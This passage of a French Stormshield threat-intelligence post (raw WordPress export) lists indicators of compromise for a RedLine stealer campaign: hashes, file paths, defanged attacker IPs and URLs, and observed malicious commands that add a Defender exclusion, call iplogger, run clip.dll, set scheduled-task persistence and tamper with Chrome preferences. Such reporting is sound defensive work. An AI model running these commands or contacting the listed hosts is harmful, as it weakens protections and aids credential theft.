<!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><td id=\"td_id_96923321\" rowspan=\"1\" colspan=\"1\" class=\"td_class_96923321\" style=\"padding: 10px; max-width: 500px; min-width: 500px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_96923321\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">8505728626a12fe960ec5581196e8e048e555e41f17a9efaf859d36c2fa6b804<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><\/tr><tr id=\"tr_id_8217956\" class=\"desktop-view tr_class_8217956 \" style=\"background: rgb(221, 221, 221);\"><!----> <td id=\"td_id_18840038\" rowspan=\"1\" colspan=\"1\" class=\"td_class_18840038\" style=\"padding: 10px; max-width: 300px; min-width: 300px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_18840038\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">ic\u00f4ne extension taille 3\t<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><td id=\"td_id_72045162\" rowspan=\"1\" colspan=\"1\" class=\"td_class_72045162\" style=\"padding: 10px; max-width: 500px; min-width: 500px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_72045162\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">09652e7cf24b1e2498f383865ef641274eaeaaee506fa473dc3c1fb3efe0e260<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><\/tr><tr id=\"tr_id_3880807\" class=\"desktop-view tr_class_3880807 \" style=\"background: rgb(255, 255, 255);\"><!----> <td id=\"td_id_55148814\" rowspan=\"1\" colspan=\"1\" class=\"td_class_55148814\" style=\"padding: 10px; max-width: 300px; min-width: 300px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_55148814\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">Rn7yRZDGjUDjkIw.exe\t<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><td id=\"td_id_93849380\" rowspan=\"1\" colspan=\"1\" class=\"td_class_93849380\" style=\"padding: 10px; max-width: 500px; min-width: 500px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_93849380\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">40d51dbfc438dbf04da507650cc73cfd1ccf369894d330b0bd5b207f8be674df<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><\/tr><tr id=\"tr_id_3181435\" class=\"desktop-view tr_class_3181435 \" style=\"background: rgb(221, 221, 221);\"><!----> <td id=\"td_id_72567352\" rowspan=\"1\" colspan=\"1\" class=\"td_class_72567352\" style=\"padding: 10px; max-width: 300px; min-width: 300px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_72567352\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">77777.exe, hlthot.exe, Application4.exe, Stealer.exe\t<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><td id=\"td_id_84090504\" rowspan=\"1\" colspan=\"1\" class=\"td_class_84090504\" style=\"padding: 10px; max-width: 500px; min-width: 500px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_84090504\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">45afb3a562e84e75c19fe08404921b2c05900a6037f04d5aa61eca9ea7254ef3<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><\/tr><tr id=\"tr_id_8526068\" class=\"desktop-view tr_class_8526068 \" style=\"background: rgb(255, 255, 255);\"><!----> <td id=\"td_id_59432965\" rowspan=\"1\" colspan=\"1\" class=\"td_class_59432965\" style=\"padding: 10px; max-width: 300px; min-width: 300px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_59432965\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">cc.exe\t<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><td id=\"td_id_43787500\" rowspan=\"1\" colspan=\"1\" class=\"td_class_43787500\" style=\"padding: 10px; max-width: 500px; min-width: 500px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_43787500\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">9b6f4e8402c7a45e596fc901db3bb74bc9de833262780aa145920ccbbfac6d2b<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><\/tr><tr id=\"tr_id_6420811\" class=\"desktop-view tr_class_6420811 \" style=\"background: rgb(221, 221, 221);\"><!----> <td id=\"td_id_78172514\" rowspan=\"1\" colspan=\"1\" class=\"td_class_78172514\" style=\"padding: 10px; max-width: 300px; min-width: 300px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_78172514\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">Lega.exe\t<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><td id=\"td_id_66696753\" rowspan=\"1\" colspan=\"1\" class=\"td_class_66696753\" style=\"padding: 10px; max-width: 500px; min-width: 500px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_66696753\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">7788bdad16dc89ceb5d5c4cdfd0acc23175f03af715a7c67c41a5b3cec418f6b<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><\/tr><tr id=\"tr_id_7186030\" class=\"desktop-view tr_class_7186030 \" style=\"background: rgb(255, 255, 255);\"><!----> <td id=\"td_id_64854346\" rowspan=\"1\" colspan=\"1\" class=\"td_class_64854346\" style=\"padding: 10px; max-width: 300px; min-width: 300px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_64854346\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">clip.dll\t<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><td id=\"td_id_88679634\" rowspan=\"1\" colspan=\"1\" class=\"td_class_88679634\" style=\"padding: 10px; max-width: 500px; min-width: 500px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_88679634\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">f336fa91d52edf1a977a5b8510c1a7b0b22dd6d51576765e10a1fc98fb38109f<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><\/tr><\/tbody><\/table><\/div>\n[\/vc_column_text][vc_empty_space][\/vc_column_inner][\/vc_row_inner][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\"][vc_column][vc_column_text]Chemins<\/p>\n<ul>\n<li>%TEMP%\\drive.bat<\/li>\n<li>%TEMP%\\svchost.bat<\/li>\n<li>%TEMP%\\svchost.exe<\/li>\n<\/ul>\n<h3>URLs \/ IPs<\/h3>\n<ul>\n<li>23[.]95.97.22<\/li>\n<li>212[.]113.119.255<\/li>\n<li>103[.]161.170.185<\/li>\n<li>hxxps:\/\/iplogger.com\/101e91<\/li>\n<li>hxxps:\/\/iplogger.com\/1wjx55<\/li>\n<li>https:\/\/bitbucket.org\/coldminusthousand\/needheater\/downloads<\/li>\n<li>hxxps:\/\/bitbucket.org\/dushanbepromo\/kingsoft\/downloads<\/li>\n<li>hxxps:\/\/bitbucket.org\/kinggodsoft\/kinggodsoft\/downloads\/<\/li>\n<li>hxxps:\/\/bitbucket.org\/8phyxsdd8t5e\/8phyxsdd8t5e\/downloads\/<\/li>\n<li>hxxps:\/\/keep-ass.online<\/li>\n<li>hxxp:\/\/23.95.97.22\/dropper.php?code_request=frontend<\/li>\n<li>hxxp:\/\/23.95.97.22\/dropper.php?code_request=backend<\/li>\n<li>hxxp:\/\/23.95.97.22\/gate\/http_handler.php<\/li>\n<li>hxxp:\/\/23.95.97.22\/getid.php?id=jnhmegjcjneklkbcajooihfbfioojjjk<\/li>\n<li>hxxp:\/\/212.113.199.255\/joomla\/index.php<\/li>\n<li>hxxp:\/\/212.113.199.255\/joomla\/Plugins\/cred.dll<\/li>\n<li>hxxp:\/\/212.113.199.255\/joomla\/Plugins\/clip.dll<\/li>\n<li>hxxps:\/\/cdn-141.anonfiles.com\/OdK1r8o6z1\/994d6bbb-1682813030\/Client.exe<\/li>\n<li>hxxps:\/\/transfer.sh\/get\/2MLt28\/77777.exe<\/li>\n<li>hxxps:\/\/transfer.sh\/get\/BqbS9m\/hlthot.exe<\/li>\n<li>hxxps:\/\/transfer.sh\/get\/FfhBd3\/Application4.exe<\/li>\n<li>hxxps:\/\/transfer.sh\/get\/FaUBkD\/Stealer.exe<\/li>\n<li>hxxps:\/\/transfer.sh\/cLjDvx\/Rn7yRZDGjUDjkIw.exe<\/li>\n<\/ul>\n<h3>Commandes<\/h3>\n<ul>\n<li>cmd \/k start \/b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath cvtres.exe<\/li>\n<li>cmd \/c start \"Togwcstgxg.exe\" &amp; start \"Yosdofwiqay.exe\" &amp; powershell -command \"Invoke-WebRequest -Uri https:\/\/iplogger[.]com\/1wjx55\"<\/li>\n<li>C:\\Windows\\System32\\rundll32.exe C:\\Users\\admin\\AppData\\Roaming\\a091ec0a6e2227\\clip.dll, Main<\/li>\n<li>C:\\Windows\\System32\\schtasks.exe\" \/Create \/SC MINUTE \/MO 1 \/TN oneetx.exe \/TR \"C:\\Users\\admin\\AppData\\Local\\Temp\\5cb6818d6c\\oneetx.exe\" \/F<\/li>\n<li>C:\\Windows\\SYSTEM32\\CMD.EXE \/c more \"C:\\Users\\user\\Desktop\\__data\" &gt; \"C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Secure Preferences\" &amp;&amp; echo 0 &gt; \"C:\\Users\\user\\Desktop\\__data1\"<\/li>\n<\/ul>\n<p>&nbsp;<\/p>\n<h2>Les protections Stormshield face au Trojan Stealer RedLine<\/h2>\n<p>Les firewalls Stormshield (Stormshield Network Security, SNS) d\u00e9tectent les tentatives d'exfiltration de donn\u00e9es effectu\u00e9 par l'extension Google Chrome, gr\u00e2ce \u00e0 la signature \"http:client:header.225 - Infostealer: Malicious chrome extension\".<\/p>\n<p>De son c\u00f4t\u00e9, le produit Stormshield Endpoint Security Evolution (SES) prot\u00e8ge contre la lecture des donn\u00e9es sensibles des stealers, via le jeu de r\u00e8gles \"Pr\u00e9vention contre la fuite d\u2019informations\".[\/vc_column_text][\/vc_column][\/vc_row]<\/p>\n<\/div>","protected":false},"excerpt":{"rendered":"<p>[vc_row css_animation=\u00a0\u00bb\u00a0\u00bb row_type=\u00a0\u00bbrow\u00a0\u00bb use_row_as_full_screen_section=\u00a0\u00bbno\u00a0\u00bb type=\u00a0\u00bbfull_width\u00a0\u00bb angled_section=\u00a0\u00bbno\u00a0\u00bb text_align=\u00a0\u00bbleft\u00a0\u00bb background_image_as_pattern=\u00a0\u00bbwithout_pattern\u00a0\u00bb][vc_column][vc_column_text]L\u2019arbre qui cache la for\u00eat, illustration cyber. En partant d\u2019une analyse d\u2019une simple extension Google Chrome malveillante, l\u2019\u00e9quipe de Cyber Threat Intelligence de Stormshield a mis en lumi\u00e8re une campagne d\u2019envergure. Entre IOCs, binaires et ex\u00e9cutables, plong\u00e9e technique&#8230;<\/p>\n","protected":false},"author":81,"featured_media":402348,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_acf_changed":false,"footnotes":""},"categories":[7065],"tags":[4368],"business_size":[],"industry":[],"help_mefind":[],"features":[],"type_security":[],"maintenance":[],"offer":[],"administration_tools":[],"cloud_offers":[],"listing_product":[1565,1530],"class_list":["post-398497","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-technical-posts-fr","tag-la-cybersecurite-par-stormshield","listing_product-ses-fr","listing_product-sns-fr"],"acf":[],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.3 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>RedLine : Trojan Stealer &amp; campagne malveillante d\u2019envergure | Stormshield<\/title>\n<meta name=\"description\" content=\"D\u2019une extension web malveillante \u00e0 une campagne globale : focus sur une menace de cybers\u00e9curit\u00e9 utilisant RedLine.\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.stormshield.com\/fr\/actus\/malware-redline-extension-chrome-campagne-malveillante-envergure\/\" \/>\n<meta property=\"og:locale\" content=\"fr_FR\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"RedLine : Trojan Stealer &amp; campagne malveillante d\u2019envergure | Stormshield\" \/>\n<meta property=\"og:description\" content=\"D\u2019une extension web malveillante \u00e0 une campagne globale : focus sur une menace de cybers\u00e9curit\u00e9 utilisant RedLine.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.stormshield.com\/fr\/actus\/malware-redline-extension-chrome-campagne-malveillante-envergure\/\" \/>\n<meta property=\"og:site_name\" content=\"Stormshield\" \/>\n<meta property=\"article:published_time\" content=\"2023-05-10T11:00:11+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2024-01-30T14:43:06+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/www.stormshield.com\/wp-content\/uploads\/shutterstock-2246992893-scaled.jpg\" \/>\n\t<meta property=\"og:image:width\" content=\"2560\" \/>\n\t<meta property=\"og:image:height\" content=\"1351\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"author\" content=\"Lucas Rival\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@Stormshield\" \/>\n<meta name=\"twitter:site\" content=\"@Stormshield\" \/>\n<meta name=\"twitter:label1\" content=\"\u00c9crit par\" \/>\n\t<meta name=\"twitter:data1\" content=\"Lucas Rival\" \/>\n\t<meta name=\"twitter:label2\" content=\"Dur\u00e9e de lecture estim\u00e9e\" \/>\n\t<meta name=\"twitter:data2\" content=\"11 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/www.stormshield.com\\\/fr\\\/actus\\\/malware-redline-extension-chrome-campagne-malveillante-envergure\\\/#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/www.stormshield.com\\\/fr\\\/actus\\\/malware-redline-extension-chrome-campagne-malveillante-envergure\\\/\"},\"author\":{\"name\":\"Lucas Rival\",\"@id\":\"https:\\\/\\\/www.stormshield.com\\\/fr\\\/#\\\/schema\\\/person\\\/89e687d23b5403c1953a1bfbdf00d80d\"},\"headline\":\"Malware RedLine : d\u2019une extension Chrome \u00e0 une campagne malveillante d\u2019envergure\",\"datePublished\":\"2023-05-10T11:00:11+00:00\",\"dateModified\":\"2024-01-30T14:43:06+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/www.stormshield.com\\\/fr\\\/actus\\\/malware-redline-extension-chrome-campagne-malveillante-envergure\\\/\"},\"wordCount\":3611,\"commentCount\":0,\"image\":{\"@id\":\"https:\\\/\\\/www.stormshield.com\\\/fr\\\/actus\\\/malware-redline-extension-chrome-campagne-malveillante-envergure\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/www.stormshield.com\\\/wp-content\\\/uploads\\\/shutterstock-2246992893-scaled.jpg\",\"keywords\":[\"La cybers\u00e9curit\u00e9 - par Stormshield\"],\"articleSection\":[\"Billets techniques\"],\"inLanguage\":\"fr-FR\"},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/www.stormshield.com\\\/fr\\\/actus\\\/malware-redline-extension-chrome-campagne-malveillante-envergure\\\/\",\"url\":\"https:\\\/\\\/www.stormshield.com\\\/fr\\\/actus\\\/malware-redline-extension-chrome-campagne-malveillante-envergure\\\/\",\"name\":\"RedLine : Trojan Stealer & campagne malveillante d\u2019envergure | Stormshield\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/www.stormshield.com\\\/fr\\\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/www.stormshield.com\\\/fr\\\/actus\\\/malware-redline-extension-chrome-campagne-malveillante-envergure\\\/#primaryimage\"},\"image\":{\"@id\":\"https:\\\/\\\/www.stormshield.com\\\/fr\\\/actus\\\/malware-redline-extension-chrome-campagne-malveillante-envergure\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/www.stormshield.com\\\/wp-content\\\/uploads\\\/shutterstock-2246992893-scaled.jpg\",\"datePublished\":\"2023-05-10T11:00:11+00:00\",\"dateModified\":\"2024-01-30T14:43:06+00:00\",\"author\":{\"@id\":\"https:\\\/\\\/www.stormshield.com\\\/fr\\\/#\\\/schema\\\/person\\\/89e687d23b5403c1953a1bfbdf00d80d\"},\"description\":\"D\u2019une extension web malveillante \u00e0 une campagne globale : focus sur une menace de cybers\u00e9curit\u00e9 utilisant RedLine.\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/www.stormshield.com\\\/fr\\\/actus\\\/malware-redline-extension-chrome-campagne-malveillante-envergure\\\/#breadcrumb\"},\"inLanguage\":\"fr-FR\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/www.stormshield.com\\\/fr\\\/actus\\\/malware-redline-extension-chrome-campagne-malveillante-envergure\\\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"fr-FR\",\"@id\":\"https:\\\/\\\/www.stormshield.com\\\/fr\\\/actus\\\/malware-redline-extension-chrome-campagne-malveillante-envergure\\\/#primaryimage\",\"url\":\"https:\\\/\\\/www.stormshield.com\\\/wp-content\\\/uploads\\\/shutterstock-2246992893-scaled.jpg\",\"contentUrl\":\"https:\\\/\\\/www.stormshield.com\\\/wp-content\\\/uploads\\\/shutterstock-2246992893-scaled.jpg\",\"width\":2560,\"height\":1351},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/www.stormshield.com\\\/fr\\\/actus\\\/malware-redline-extension-chrome-campagne-malveillante-envergure\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/www.stormshield.com\\\/fr\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Malware RedLine : d\u2019une extension Chrome \u00e0 une campagne malveillante d\u2019envergure\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/www.stormshield.com\\\/fr\\\/#website\",\"url\":\"https:\\\/\\\/www.stormshield.com\\\/fr\\\/\",\"name\":\"Stormshield\",\"description\":\"Stormshield\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/www.stormshield.com\\\/fr\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"fr-FR\"},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/www.stormshield.com\\\/fr\\\/#\\\/schema\\\/person\\\/89e687d23b5403c1953a1bfbdf00d80d\",\"name\":\"Lucas Rival\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"fr-FR\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/d9ba38a598497e2e115f72a0e747302808cdf63d9d61d9ffdb543e335d421c15?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/d9ba38a598497e2e115f72a0e747302808cdf63d9d61d9ffdb543e335d421c15?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/d9ba38a598497e2e115f72a0e747302808cdf63d9d61d9ffdb543e335d421c15?s=96&d=mm&r=g\",\"caption\":\"Lucas Rival\"}}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"RedLine : Trojan Stealer & campagne malveillante d\u2019envergure | Stormshield","description":"D\u2019une extension web malveillante \u00e0 une campagne globale : focus sur une menace de cybers\u00e9curit\u00e9 utilisant RedLine.","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.stormshield.com\/fr\/actus\/malware-redline-extension-chrome-campagne-malveillante-envergure\/","og_locale":"fr_FR","og_type":"article","og_title":"RedLine : Trojan Stealer & campagne malveillante d\u2019envergure | Stormshield","og_description":"D\u2019une extension web malveillante \u00e0 une campagne globale : focus sur une menace de cybers\u00e9curit\u00e9 utilisant RedLine.","og_url":"https:\/\/www.stormshield.com\/fr\/actus\/malware-redline-extension-chrome-campagne-malveillante-envergure\/","og_site_name":"Stormshield","article_published_time":"2023-05-10T11:00:11+00:00","article_modified_time":"2024-01-30T14:43:06+00:00","og_image":[{"width":2560,"height":1351,"url":"https:\/\/www.stormshield.com\/wp-content\/uploads\/shutterstock-2246992893-scaled.jpg","type":"image\/jpeg"}],"author":"Lucas Rival","twitter_card":"summary_large_image","twitter_creator":"@Stormshield","twitter_site":"@Stormshield","twitter_misc":{"\u00c9crit par":"Lucas Rival","Dur\u00e9e de lecture estim\u00e9e":"11 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/www.stormshield.com\/fr\/actus\/malware-redline-extension-chrome-campagne-malveillante-envergure\/#article","isPartOf":{"@id":"https:\/\/www.stormshield.com\/fr\/actus\/malware-redline-extension-chrome-campagne-malveillante-envergure\/"},"author":{"name":"Lucas Rival","@id":"https:\/\/www.stormshield.com\/fr\/#\/schema\/person\/89e687d23b5403c1953a1bfbdf00d80d"},"headline":"Malware RedLine : d\u2019une extension Chrome \u00e0 une campagne malveillante d\u2019envergure","datePublished":"2023-05-10T11:00:11+00:00","dateModified":"2024-01-30T14:43:06+00:00","mainEntityOfPage":{"@id":"https:\/\/www.stormshield.com\/fr\/actus\/malware-redline-extension-chrome-campagne-malveillante-envergure\/"},"wordCount":3611,"commentCount":0,"image":{"@id":"https:\/\/www.stormshield.com\/fr\/actus\/malware-redline-extension-chrome-campagne-malveillante-envergure\/#primaryimage"},"thumbnailUrl":"https:\/\/www.stormshield.com\/wp-content\/uploads\/shutterstock-2246992893-scaled.jpg","keywords":["La cybers\u00e9curit\u00e9 - par Stormshield"],"articleSection":["Billets techniques"],"inLanguage":"fr-FR"},{"@type":"WebPage","@id":"https:\/\/www.stormshield.com\/fr\/actus\/malware-redline-extension-chrome-campagne-malveillante-envergure\/","url":"https:\/\/www.stormshield.com\/fr\/actus\/malware-redline-extension-chrome-campagne-malveillante-envergure\/","name":"RedLine : Trojan Stealer & campagne malveillante d\u2019envergure | 